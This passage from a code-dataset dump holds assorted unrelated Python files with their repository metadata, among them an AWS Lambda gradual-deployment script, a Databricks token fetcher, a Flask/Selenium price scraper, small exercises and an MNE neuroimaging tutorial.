'experiment': ipts,\n 'exts': extensions,\n 'projection': projection,\n }\n return super().runs(params_json)\n \n def run(self, instrument, ipts, file_location):\n '''\n '''\n return super().run(self.facility, instrument, ipts, file_location)\n\n\nif __name__ == \"__main__\":\n \n from http.client import HTTPConnection\n HTTPConnection.debuglevel = 1\n\n logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from requests\n logging.getLogger().setLevel(logging.DEBUG)\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True\n\n # ## HFIR\n # oncat = HFIR()\n # res = oncat.experiments(\"CG3\")\n # res = oncat.runs(\"CG3\", ipts='IPTS-19469', exp='exp406')\n # res = oncat.run(\"CG3\", 'IPTS-19469', '/HFIR/CG3/IPTS-19469/exp406/Datafiles/BioSANS_exp406_scan0016_0001.xml')\n \n\n ## SNS\n oncat = SNS()\n # res = oncat.experiments(\"EQSANS\")\n res = oncat.runs(\"EQSANS\", 'IPTS-19298')\n # res = oncat.run(\"EQSANS\", 'IPTS-19298', '/SNS/EQSANS/IPTS-19298/nexus/EQSANS_87594.nxs.h5')\n\n print(\"\\n\"+80*\"*\")\n pprint(res)\n","repo_name":"neutrons/WebReduction","sub_path":"src/server/apps/catalog/oncat/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"241569282","text":"'''\nmamikhai@cisco.com\n20200111\nstarting constants for monitor.py\n'''\nmodel_directory = './model' # delete or rename folder to have a fresh model, or if you change layers, optimizer, etc.\n\nx_periods = 0\n\nfeature_mean = 0.0\nfeature_std = 0.0\nfeature_max = 0.0\n\ntunnel_ifs = ['tunnel-te11200', 'tunnel-te11201', 'tunnel-te13501', 'tunnel-te13502', 'tunnel-te13703', 'tunnel-te13704', 'tunnel-te17801', 'tunnel-te17802', 'tunnel-te12400', 'tunnel-te12401', 'tunnel-te12402', 'tunnel-te12403', 'tunnel-te12404', 'tunnel-te12500', 'tunnel-te12501', 'tunnel-te12502', 'tunnel-te12503', 'tunnel-te12504']\n\n# physical_ifs = ['GigabitEthernet0/0/0/0.1224', 'GigabitEthernet0/0/0/0.1424', 
'GigabitEthernet0/0/0/0.1225', 'GigabitEthernet0/0/0/0.1525']\nphysical_ifs = []\n\ninterval = 600 # wait time between prediction cycles, seconds\nhidden_units = [72, 36, 18] # 36, 36 is an overkill!\n\n","repo_name":"mikemikhail/ML-anomaly_detection","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"36939617114","text":"#!/usr/bin/env python\n\n#####################################################################################################\n# The basic dictionary of plots which most analyzer produce. #\n# This is used directly in variablesInfo, but can be also imported in each variablesInfo_[ANALYZER] #\n# #\n# Author: A. Mecca (alberto.mecca@cern.ch) #\n#####################################################################################################\n\ndef getVarInfo_VVX(region):\n VarInfo_VVX = {\n \"AAA_cuts\" : {'title':'Cuts', 'text':True, 'unblind':True, 'logy':True, 'ymin':1},\n 'channel_lep':{'title':'lepton flavour', 'text':True, 'unblind':True}\n }\n return VarInfo_VVX\n","repo_name":"bellan/VVXAnalysis","sub_path":"TreeAnalysis/python/variablesInfo_VVX.py","file_name":"variablesInfo_VVX.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"70905274469","text":"import os, requests, json\nfrom base64 import b64encode\n\n\ndef get_databricks_token():\n \"\"\"get databricks token for a service principal\"\"\"\n \n account_id = os.environ.get(\"DATABRICKS_ACCOUNT_ID\")\n client_id = os.environ.get(\"DATABRICKS_CLIENT_ID\")\n client_secret = os.environ.get(\"DATABRICKS_CLIENT_SECRET\")\n\n token_url = f\"https://accounts.cloud.databricks.com/oidc/accounts/{account_id}/v1/token\"\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Authorization\": \"Basic \" + b64encode(f\"{client_id}:{client_secret}\".encode()).decode()\n }\n payload = {\n \"grant_type\": \"client_credentials\",\n \"scope\": \"all-apis\"\n }\n\n response = requests.post(token_url, headers = headers, data = payload)\n response_data = json.loads(response.text)\n if \"access_token\" in response_data:\n print(response_data[\"access_token\"])\n else: print(\"could not get access token....\")\n \n\nif __name__ == \"__main__\":\n get_databricks_token()","repo_name":"robert-altmiller/terraform_template","sub_path":"terraform/python/get_dbricks_token.py","file_name":"get_dbricks_token.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"15382640379","text":"import unittest\nfrom implementation.algorithms.node import Node\nfrom implementation.customer import Customer\n\n\nclass TestNode(unittest.TestCase):\n\n def setUp(self):\n test_customer = Customer(65, 'George', 53.6, 7.0)\n self.test_node = Node(test_customer)\n\n def test_nodes_valid(self):\n test_customer = Customer(65, 'George', 53.6, 7.0)\n self.assertEquals(test_customer, self.test_node.customer)\n\n def test_nodes_invalid(self):\n test_customer = Customer(65, 'Beorge', 53.6, 7.0)\n self.assertEquals(test_customer, self.test_node.customer)\n\n def test_children(self):\n test_customer1 = Customer(66, 'Dude', 53.6, 7.0)\n test_customer2 = Customer(67, 'Dudette', 53.6, 7.0)\n self.test_node.left_child = Node(test_customer1)\n self.test_node.right_child = Node(test_customer2)\n 
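       # both children were attached above; they should exist and be distinct\n        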
self.assertIsNotNone(self.test_node.left_child)\n self.assertIsNotNone(self.test_node.right_child)\n self.assertIsNot(self.test_node.left_child, self.test_node.right_child)\n","repo_name":"GACiobanita/Customer-Distance-Test","sub_path":"tests/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72961822628","text":"from distutils.log import debug\nfrom flask import Flask, render_template, redirect\nfrom selenium.webdriver.chrome.options import Options\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\napp = Flask(__name__)\n\npicFolder = os.path.join(\"static\",\"pics\")\nstyleFolder = os.path.join(\"static\",\"styles\")\njsFolder = os.path.join(\"static\",\"js\")\n\napp.config[\"UPLOAD_FOLDER\"] = picFolder\napp.config[\"STYLE_FOLDER\"] = styleFolder\napp.config[\"JS_FOLDER\"] = jsFolder\n\ndef reditection():\n return render_template(\"test.html\")\n\n@app.route('/')\ndef index():\n driver = webdriver.Chrome(executable_path=\"chromedriver\",)\n driver.get(\"https://wethenew.com/products/air-jordan-1-high-zoom-air-cmft-easter?variant=39355247558765\")\n acceptCookies = driver.find_element_by_id(\"didomi-notice-agree-button\").click()\n findPrice = driver.find_element_by_xpath('/html/body/div[5]/div/div[2]/div/div/div[1]/div[2]/p[2]/span[2]/span/span')\n priceInner = findPrice.get_attribute(\"innerHTML\")\n jordanOneEasterPrice = priceInner.strip()\n driver.close()\n\n driver = webdriver.Chrome(executable_path=\"chromedriver\")\n driver.get(\"https://wethenew.com/products/adidas-yeezy-boost-350-v2-mono-mist?variant=39410683904109\")\n acceptCookies = driver.find_element_by_id(\"didomi-notice-agree-button\").click()\n #time.sleep(10)\n #webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n findPrice = driver.find_element_by_xpath('/html/body/div[5]/div/div[2]/div/div/div[1]/div[2]/p[2]/span[2]/span/span')\n priceInner = findPrice.get_attribute(\"innerHTML\")\n yeezy250MonoMistPrice = priceInner.strip()\n driver.close()\n\n style = os.path.join(app.config[\"STYLE_FOLDER\"], 'style.css')\n js = os.path.join(app.config[\"JS_FOLDER\"], \"app.js\")\n firstPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"slider1.jpg\")\n secondPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"slider2.jpg\")\n thirdPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"slider3.jpg\")\n jordanOneEasterPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"jordanOneEaster.jpg\")\n yeezy350MonoMistPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"yeezy350MonoMist.jpg\")\n return render_template(\"index.html\",priceJordan=jordanOneEasterPrice,style=style,sliderImg=firstPic,jordanOneEaster=jordanOneEasterPic,yeezy350MonoMist=yeezy350MonoMistPic,priceYeezy250MonoMist=yeezy250MonoMistPrice,secondSlider=secondPic,thirdSlider=thirdPic,js=js)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"baptisteCanac/wethenewPricesChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22527788875","text":"import datetime\nfrom typing import List\n\nfrom CollectionsContainer import Collections, CollectionItem\n\n\ndef get_user_cost():\n while True:\n inpt = input(\"Напишите цену предмета:\\n\")\n try:\n return int(inpt)\n except:\n print(\"Неверная цена 
предмета.\\n\")\n raise Exception\n\n\ndef get_user_date():\n def is_true(text1:str, text2:str, ret):\n inpt = input(text1)\n if inpt.lower() == \"д\":\n return ret\n else:\n inpt = input(text2)\n try:\n return int(inpt)\n except:\n print(\"Не число.\\n\")\n raise Exception\n try:\n now = datetime.datetime.now()\n now = now.replace(\n is_true(\"Год: \" +str(now.year) +\". д/н. \", \"Введите год: \", now.year),\n is_true(\"Месяц: \" +str(now.month) +\". д/н. \", \"Введите месяц: \", now.month),\n is_true(\"День: \" +str(now.day) +\". д/н. \", \"Введите день: \", now.day),\n is_true(\"Час: \" +str(now.hour) +\". д/н. \", \"Введите час: \", now.hour),\n is_true(\"Минута: \" +str(now.minute)+\". д/н. \", \"Введите минуту: \", now.minute),\n is_true(\"Секунда: \" +str(now.second)+\". д/н. \", \"Введите секунду: \", now.second),\n 0)\n return now\n except:\n print(\"Неправильна была введена дата.\\n\")\n raise Exception\n\n\ndef get_user_category(categories: List[str]):\n inpt = input(\"1. Выбрать из сущесвующей категории\\n\"\n \"2. Создать новую категорию\\n\")\n if inpt == \"1\":\n if (len(categories) == 0):\n print(\"Нет категорий для выбора.\")\n raise Exception\n print(f\"Сущестующие категории ({len(categories)}):\\n\")\n for i, item in enumerate(categories):\n print(f\"{i + 1}. {item}\")\n print(\"\")\n\n inpt = input(\"Напишите номер категории: \")\n try:\n num = int(inpt)\n except:\n print(\"Ввод не число.\")\n raise Exception\n if num <= 0 or num > len(categories)+1:\n print(\"Номер больше чем кол-во категорий.\")\n raise Exception\n return categories[num-1]\n elif inpt == \"2\":\n inpt = input(\"Напишите новую категорию: \")\n if inpt in categories or inpt == \"всё\":\n print(\"Уже есть такая категория.\")\n raise Exception\n return inpt\n else:\n print(\"Неверный выбор.\")\n\n\ndef add_item(collection: Collections):\n try:\n name = input(\"Напишите имя предмета:\\n\")\n cost = get_user_cost()\n date = get_user_date()\n category = get_user_category(collection.get_categories())\n\n new_item = CollectionItem(name, cost, date)\n collection.add_to_category(category, new_item)\n except:\n return\n","repo_name":"YurikovSpaceEye/programming_homework","sub_path":"add_item_ui.py","file_name":"add_item_ui.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32511220753","text":"import pymongo\n\nfrom value.strings import *\n\nclient = pymongo.MongoClient(MONGODB_URL)\ndb_sensora = client[SENSORA_]\ncoll_dd_mangalist = db_sensora[DD_MANGALIST_]\ncoll_manga_info = db_sensora[MANGA_INFO_]\ncoll_manga_map = db_sensora[MANGA_MAP_]\n\n","repo_name":"SingSongZepe/sensora","sub_path":"enmap/mongo/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"7780060159","text":"import sys\nimport pygame\nfrom pygame.locals import *\n\nimport state\nimport game\n\n\n\n\nclass Title(state.State):\n #.. the self variable represents the instance of the object itself\n #.. The __init__ method is roughly what represents a constructor in Python. When you call A()\n # Python creates an object for you, and passes it as the first parameter to the __init__ method. 
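\n    # (i.e. A() first runs A.__new__ to create the instance, then calls A.__init__ on it)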
\n # Any additional parameters (e.g., A(24, 'Hello')) will also get passed as arguments--in \n # this case causing an exception to be raised, since the constructor isn't expecting them\n def __init__(self):\n self.display = pygame.display.get_surface()\n\n self.background = pygame.image.load('data/images/background_frame3.png')\n self.font_manager = pygame.font.SysFont(\"comicssansms\", 64)\n self.help_font_manager = pygame.font.SysFont(\"comicssansms\", 28)\n self.title_font_manager = pygame.font.SysFont(\"comicssansms\", 104)\n\n self.title = self.title_font_manager.render(\"Color Shooter\", True, (255, 255, 255))\n self.title_rect = pygame.Rect((self.display.get_width() / 2 - self.title.get_width() / 2,\n self.display.get_height() / 2 - self.title.get_height() * 2),\n (self.title.get_width(), self.title.get_height()))\n self.title_color = \"white\"\n self.start_game = self.font_manager.render(\"START\", True, (255, 255, 255))\n self.start_game_rect = pygame.Rect((self.display.get_width() / 2 - self.start_game.get_width() / 2,\n self.display.get_height() / 2 - self.start_game.get_height()),\n (self.start_game.get_width(), self.start_game.get_height()))\n\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.help_rect = pygame.Rect(\n (self.display.get_width() / 2 - self.help.get_width() / 2, self.display.get_height() / 2),\n (self.help.get_width(), self.help.get_height()))\n\n self.help_image = pygame.image.load(\"data/images/instructions.png\").convert_alpha()\n self.help_image_rect = pygame.Rect((self.display.get_width() / 2 - self.help_image.get_width() / 2,\n self.display.get_height() / 2 - self.help_image.get_height() / 2),\n (self.help_image.get_width(), self.help_image.get_height()))\n\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.exit_game_rect = pygame.Rect((self.display.get_width() / 2 - self.exit_game.get_width() / 2,\n self.display.get_height() / 2 + self.exit_game.get_height()),\n (self.exit_game.get_width(), self.exit_game.get_height()))\n\n self.current_choice = 1\n\n self.show_help = False\n\n self.timer = pygame.time.Clock()\n\n self.music = pygame.mixer.Sound(\"data/sound/title_highscore.wav\")\n\n self.music.play(loops=-1)\n def exit(self):\n self.music.stop()\n self.display.blit(self.background, (0, 0))\n pygame.display.flip()\n\n def reason(self):\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_RETURN:\n if self.show_help:\n self.show_help = False\n else:\n if self.current_choice == 1:\n\n return game.Game()\n elif self.current_choice == 2:\n self.show_help = True\n elif self.current_choice == 3:\n pygame.quit()\n sys.exit()\n if event.key == K_DOWN:\n self.next()\n if event.key == K_UP:\n self.previous()\n\n def act(self):\n self.timer.tick(40)\n self.animate_title()\n\n self.display.blit(self.background, (0, 0))\n if self.show_help:\n self.display.blit(self.help_image, self.help_image_rect)\n else:\n self.display.blit(self.title, self.title_rect)\n self.display.blit(self.start_game, self.start_game_rect)\n self.display.blit(self.help, self.help_rect)\n self.display.blit(self.exit_game, self.exit_game_rect)\n\n pygame.display.update()\n\n def next(self):\n if self.current_choice == 1:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (255, 255, 255))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 2\n elif self.current_choice == 2:\n self.start_game = 
self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (255, 255, 255))\n self.current_choice = 3\n else:\n self.start_game = self.font_manager.render(\"START\", True, (255, 255, 255))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 1\n\n def previous(self):\n if self.current_choice == 1:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (255, 255, 255))\n self.current_choice = 3\n elif self.current_choice == 2:\n self.start_game = self.font_manager.render(\"START\", True, (255, 255, 255))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 1\n else:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (255, 255, 255))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 2\n\n def animate_title(self):\n if self.title_color == \"white\":\n self.title = self.title_font_manager.render(\"Color Shooter\", True, (254, 4, 2))\n self.title_color = \"red\"\n else:\n self.title = self.title_font_manager.render(\"Color Shooter\", True, (255, 255, 255))\n self.title_color = \"white\"\n\n","repo_name":"louiehernandez95/Color-Shooter-Game","sub_path":"title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8621255436","text":"from setuptools import setup\n\npackage_name = 'topics'\n\nsetup(\n name=package_name,\n version='1.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='Raúl Lara',\n maintainer_email='raul.lara@upm.es',\n description='Prueba de concepto de los topics de ROS2',\n license='GPL',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"emisor = topics.emisor:main\",\n \"receptor = topics.receptor:main\"\n ],\n },\n)\n","repo_name":"laracabrera/robotica","sub_path":"ros2/src/topics/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"} +{"seq_id":"17475675578","text":"import time\nimport boto3\nfrom datetime import datetime, date, timedelta\nimport logging\n\nlog = logging.getLogger('simple')\nlambda_client = None\n\ndef handler(event, context):\n\tinit()\n\tvalidate_input(event)\n\n\tfunc_name = event['function-name']\n\tversion = event['new-version']\n\talias_name = event['alias-name']\n\tsteps = event['steps']\n\tinterval = event['interval']\n\tweight_function = event.get('type', 'linear')\n\thealth_check = event.get('health-check', True)\n\n\tweights = generate_weights(weight_function, steps)\n\tstart_time = time.time()\n\n\tlog.info(\"Calculated alias weight progression: {0}\".format(weights))\n\n\tfor weight in weights:\n\t\tupdate_weight(func_name, alias_name, version, weight)\n\t\tsleep(interval)\n\n\t\tif 
health_check:\n\t\t\tsuccess = do_health_check(func_name, alias_name, version)\n\t\t\tif not success:\n\t\t\t\trollback(func_name, alias_name)\n\t\t\t\traise Exception(\"Health check failed, exiting\")\n\n\tres = finalize(func_name, alias_name, version)\n\tend_time = time.time()\n\n\tlog.info(\"Alias {0}:{1} is now routing 100% of traffic to version {2}\".format(func_name, alias_name, version))\n\tlog.info(\"Finished after {0}s\".format(round(end_time - start_time, 2)))\n\n\treturn res\n\ndef update_weight(func_name, alias_name, version, next_weight):\n\tlog.info(\"Updating weight of alias {1}:{2} for version {0} to {3}\".format(version, func_name, alias_name, next_weight))\n\tclient = get_lambda_client()\n\n\tweights = {\n\t\tversion : next_weight\n\t}\n\trouting_config = {\n\t\t'AdditionalVersionWeights' : weights\n\t}\n\n\tclient.update_alias(FunctionName=func_name, Name=alias_name, RoutingConfig=routing_config)\n\treturn\n\ndef sleep(sleep_time):\n\ttime.sleep(sleep_time)\n\ndef validate_input(event):\n\tif not 'function-name' in event:\n\t\traise Exception(\"'function-name' is required\")\n\tif not 'new-version' in event:\n\t\traise Exception(\"'new-version' is required\")\n\tif not 'alias-name' in event:\n\t\traise Exception(\"'alias-name' is required\")\n\tif not 'interval' in event:\n\t\traise Exception(\"'interval' is required\")\n\tif not 'steps' in event:\n\t\traise Exception(\"'steps' is required\")\n\ndef do_health_check(func_name, alias_name, version):\n\t# implement custom health checks here (i.e. invoke, cloudwatch alarms, etc)\n\treturn check_errors_in_cloudwatch(func_name, alias_name, version)\n\n# Return False if any error metrics were emitted in the last minute for the function/alias/new version combination\ndef check_errors_in_cloudwatch(func_name, alias_name, new_version):\n\tclient = boto3.client('cloudwatch')\n\n\tfunc_plus_alias = func_name + \":\" + alias_name\n\tnow = datetime.utcnow()\n\tstart_time = now - timedelta(minutes=1)\n\n\tresponse = client.get_metric_statistics(\n\t\tNamespace='AWS/Lambda',\n\t\tMetricName='Errors',\n\t\tDimensions=[\n\t\t\t{\n\t\t\t\t'Name': 'FunctionName',\n\t\t\t\t'Value': func_name\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Name': 'Resource',\n\t\t\t\t'Value': func_plus_alias\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Name': 'ExecutedVersion',\n\t\t\t\t'Value': new_version\n\t\t\t}\n\t\t],\n\t\tStartTime=start_time,\n\t\tEndTime=now,\n\t\tPeriod=60,\n\t\tStatistics=['Sum']\n\t)\n\tdatapoints = response['Datapoints']\n\tfor datapoint in datapoints:\n\t\tif datapoint['Sum'] > 0:\n\t\t\tlog.info(\"Failing health check because error metrics were found for new version: {0}\".format(datapoints))\n\t\t\treturn False\n\n\treturn True\n\ndef rollback(func_name, alias_name):\n\tlog.info(\"Health check failed. 
Rolling back to original version\")\n\tclient = get_lambda_client()\n\trouting_config = {\n\t\t'AdditionalVersionWeights' : {}\n\t}\n\tclient.update_alias(FunctionName=func_name, Name=alias_name, RoutingConfig=routing_config)\n\tlog.info(\"Alias was successfully rolled back to original version\")\n\treturn\n\n# Set the new version as the primary version and reset the AdditionalVersionWeights\ndef finalize(func_name, alias_name, version):\n\tclient = get_lambda_client()\n\trouting_config = {\n\t\t'AdditionalVersionWeights' : {}\n\t}\n\tres = client.update_alias(FunctionName=func_name, FunctionVersion=version, Name=alias_name, RoutingConfig=routing_config)\n\treturn res\n\ndef generate_weights(type, steps):\n\tif type == \"linear\":\n\t\tvalues = linear(steps)\n\t# implement other functions here\n\telse:\n\t\traise Exception(\"Invalid function type: \" + type)\n\treturn values\n\ndef get_num_points(time, interval):\n\treturn time / interval\n\ndef linear(num_points):\n\tdelta = 1.0 / num_points\n\tprev = 0\n\tvalues = []\n\tfor i in range(0, num_points):\n\t\tval = prev + delta\n\t\tvalues.append(round(val, 2))\n\t\tprev = val\n\treturn values\n\ndef get_lambda_client():\n\tglobal lambda_client\n\tif lambda_client is None:\n\t\tlambda_client = boto3.client('lambda')\n\treturn lambda_client\n\ndef init():\n\tlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\tfor logging_handler in logging.root.handlers:\n\t\tlogging_handler.addFilter(logging.Filter('simple'))\n\ndef main():\n\t# main() is useful for testing locally. not used when run in Lambda\n\ttest_event = {\n\t\t'function-name': \"echo\",\n\t\t 'new-version': \"1\",\n\t\t 'alias-name': \"myalias\",\n\t\t 'steps': 10,\n\t\t 'interval': 5,\n\t\t 'type': \"linear\",\n\t\t 'health-check': True\n\t}\n\tlog.info(handler(test_event, \"\"))\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"aws-samples/aws-lambda-deploy","sub_path":"functions/simple/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"71"} +{"seq_id":"5141256329","text":"import time\nimport random\nimport threading\n\nfrom semaphore import Semaphore\n\n\nclass Ball:\n\n def __init__(self):\n self.time_count = 0\n self.sem = Semaphore()\n\n def get_the_ball(self, thread):\n while(self.time_count < 45):\n self.sem.down(thread) # down\n\n if thread.was_sleeping:\n thread.was_sleeping = False\n else:\n # CRITICAL REGION\n time.sleep(random.randint(1, 2)) # min 1 sec / max 2 sec\n \n # Leave critical region\n self.left_the_ball(thread)\n self.time_count += 1\n \n if not self.sem.is_active() and self.sem.has_someone_sleeping():\n self.sem.up()\n\n def left_the_ball(self, thread):\n print(thread.get_name(), \"left the ball!\")\n self.sem.up() # up\n time.sleep(random.randint(1, 2))\n","repo_name":"vieirafrancisco/algorithms","sub_path":"concurrent_programming/Threads/Semaphore/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"42416812198","text":"__author__ = 'Зелепукин Алексей Юрьевич'\n\nimport os\nimport shutil\n\n# Задача-1:\n# Напишите скрипт, создающий директории dir_1 - dir_9 в папке,\n# из которой запущен данный скрипт.\n# И второй скрипт, удаляющий эти папки.\n\n\ndef make_dir(name):\n path = os.path.join(os.getcwd(), name)\n try:\n os.mkdir(path)\n return True\n except 
FileExistsError:\n return False\n\n\ndef remove_dir(name):\n path = os.path.join(os.getcwd(), name)\n try:\n os.rmdir(path)\n return True\n except OSError:\n return False\n\n\n# names = ['dir_' + str(i) for i in range(1, 10)]\n# print(os.listdir(os.getcwd()))\n# for name in names:\n# make_dir(name)\n# print(os.listdir(os.getcwd()))\n# for name in names:\n# remove_dir(name)\n# print(os.listdir(os.getcwd()))\n\n# Задача-2:\n# Напишите скрипт, отображающий папки текущей директории.\n\n\ndef list_dir(path=os.getcwd(), mode='d'):\n output_list = []\n content = os.listdir(path)\n if mode == 'a':\n output_list = content\n elif mode == 'd':\n for item in content:\n if os.path.isdir(item):\n output_list.append(item)\n elif mode == 'f':\n for item in content:\n if os.path.isfile(item):\n output_list.append(item)\n else:\n output_list = content\n return output_list\n\n\n# print(list_dir())\n# for name in names:\n# make_dir(name)\n# print(list_dir())\n# for name in names:\n# remove_dir(name)\n# print(list_dir())\n\n# Задача-3:\n# Напишите скрипт, создающий копию файла, из которого запущен данный скрипт.\n\n\ndef copy_file(file_path=os.path.realpath(__file__)):\n i = 1\n file_name = os.path.basename(file_path)\n copy_name = 'copy' + '0' + str(i) + '_' + file_name if i < 10 else 'copy' + str(i) + '_' + file_name\n while os.path.isfile(copy_name):\n i += 1\n copy_name = 'copy' + '0' + str(i) + '_' + file_name if i < 10 else 'copy' + str(i) + '_' + file_name\n else:\n shutil.copy(os.path.join(os.path.dirname(file_path), file_name),\n os.path.join(os.path.dirname(file_path), copy_name))\n return True\n\n\n# copy_file()\n\n\ndef change_dir(path):\n try:\n os.chdir(path)\n return True\n except FileNotFoundError:\n return False\n\n\n","repo_name":"alekseyzelepukin/python_basic","sub_path":"lesson_05/hw05_easy.py","file_name":"hw05_easy.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21886821063","text":"#Trying to get output from the GDAX REST API\n\nimport requests\nimport json\n\n#get a response from GDAX\nprods = requests.get('https://api-public.sandbox.gdax.com/products')\n\n#format response from json to a list of dicts\nprodsdata = json.loads(prods.text)\n\n#for i in range(0, len(prodsdata)):\n #print(\"Entry {0}: {1}\".format(i, prodsdata[i][\"id\"]))\n\nbtcusd = prodsdata[0]\n\nwith open('gdaxproducts.txt', 'w') as f:\n f.write(\"The products offered from the GDAX REST API:\\n\\n\\n\")\n f.write(\"The GDAX REST API offers conversion rates between the following currencies:\\n\")\n for i in range(0, len(prodsdata)):\n f.write(\"{0}\\n\".format(prodsdata[i][\"id\"]))\n f.write(\"\\n\")\n\n f.write(\"For each of these currency pairings, the following attributes are available:\\n\")\n for i in prodsdata[0]:\n f.write(\"{0}\\n\".format(i))\n \n","repo_name":"zackcter/gdax-analytics","sub_path":"prodpop.py","file_name":"prodpop.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19288256845","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nimport mne\nfrom mne import read_evokeds\nfrom mne.datasets import fetch_hcp_mmp_parcellation, sample\nfrom mne.minimum_norm import apply_inverse, read_inverse_operator\n\ndata_path = sample.data_path()\nmeg_path = data_path / \"MEG\" / \"sample\"\nsubjects_dir = data_path / \"subjects\"\n\nfname_evoked = meg_path / 
\"sample_audvis-ave.fif\"\nfname_stc = meg_path / \"sample_audvis-meg\"\nfetch_hcp_mmp_parcellation(subjects_dir)\n\n# %%\n# Then, we read the stc from file.\nstc = mne.read_source_estimate(fname_stc, subject=\"sample\")\n\n# %%\n# This is a :class:`SourceEstimate <mne.SourceEstimate>` object.\nprint(stc)\n\n# %%\n# The SourceEstimate object is in fact a *surface* source estimate. MNE also\n# supports volume-based source estimates but more on that later.\n#\n# We can plot the source estimate using the\n# :func:`stc.plot <mne.SourceEstimate.plot>` just as in other MNE\n# objects. Note that for this visualization to work, you must have ``PyVista``\n# installed on your machine.\ninitial_time = 0.1\nbrain = stc.plot(\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n clim=dict(kind=\"value\", lims=[3, 6, 9]),\n smoothing_steps=7,\n)\n\n# %%\n# You can also morph it to fsaverage and visualize it using a flatmap.\n\n# sphinx_gallery_thumbnail_number = 3\nstc_fs = mne.compute_source_morph(\n stc, \"sample\", \"fsaverage\", subjects_dir, smooth=5, verbose=\"error\"\n).apply(stc)\nbrain = stc_fs.plot(\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n clim=dict(kind=\"value\", lims=[3, 6, 9]),\n surface=\"flat\",\n hemi=\"both\",\n size=(1000, 500),\n smoothing_steps=5,\n time_viewer=False,\n add_data_kwargs=dict(colorbar_kwargs=dict(label_font_size=10)),\n)\n\n# to help orient us, let's add a parcellation (red=auditory, green=motor,\n# blue=visual)\nbrain.add_annotation(\"HCPMMP1_combined\", borders=2)\n\n# You can save a movie like the one on our documentation website with:\n# brain.save_movie(time_dilation=20, 